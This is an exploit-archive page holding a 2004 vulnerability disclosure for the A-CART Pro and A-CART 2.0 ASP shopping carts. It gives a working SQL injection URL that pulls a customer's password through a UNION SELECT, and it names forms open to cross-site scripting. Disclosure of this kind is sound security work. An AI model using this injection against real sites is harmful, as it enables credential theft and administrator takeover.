exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

acartSQL.txt

acartSQL.txt
Posted Mar 29, 2004
Authored by Manuel Lopez

A-CART Pro and A-CART 2.0 suffer from input validation holes that allow for SQL injection and cross site scripting attacks. Full exploitation demonstrated.

tags | exploit, xss, sql injection
SHA-256 | 8f3fb7e46432c3d39ecb946dbebf7c30a6f165544414b8ef971ac87628e8bb6b

acartSQL.txt

Change Mirror Download
#Title: A-CART Pro & A-CART 2.0 Input Validation Holes 

#Software: A-CART Pro & A-CART 2.0
#Vendor: http://www.alanward.net
#Underlying OS: Windows.

#Description:

A-CART is an ASP shopping cart application written in VBScript. The system
allows a customer to browse through an inventory of products and add these
items to their virtual shopping cart. Features include hierarchial
categories, featured product, custom attributes and user profiles.

#Vulnerabilities:

A-CART input validation holes let remote users inject SQL and conduct
Cross-Site Scripting attacks.

#SQL Injection#

An Sql injection vulnerability allows a remote attacker to execute malicious
SQL statements on the database to gain Administrator access.

/category.asp?catcode=[SqlInjection]

#-Exploit-#

http://host/category.asp?catcode=1%20union%20all%20select%20pass,0,0,0,0%20f
rom%20customers%20where%20fname='[Username]'

#Cross-Site Scripting#

This product is vulnerable to the Cross-Site Scripting vulnerability that
would allow attackers to inject HTML and script codes into the pages and
execute it on the client's browser.
The vulnerability exists on the user information forms in deliver.asp,
billing.asp.

#Solution:

No solution was available at the time of this entry. Vendor contacted three
times and three unanswered mails.

#Credits:

Manuel López. mantra@gulo.org
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close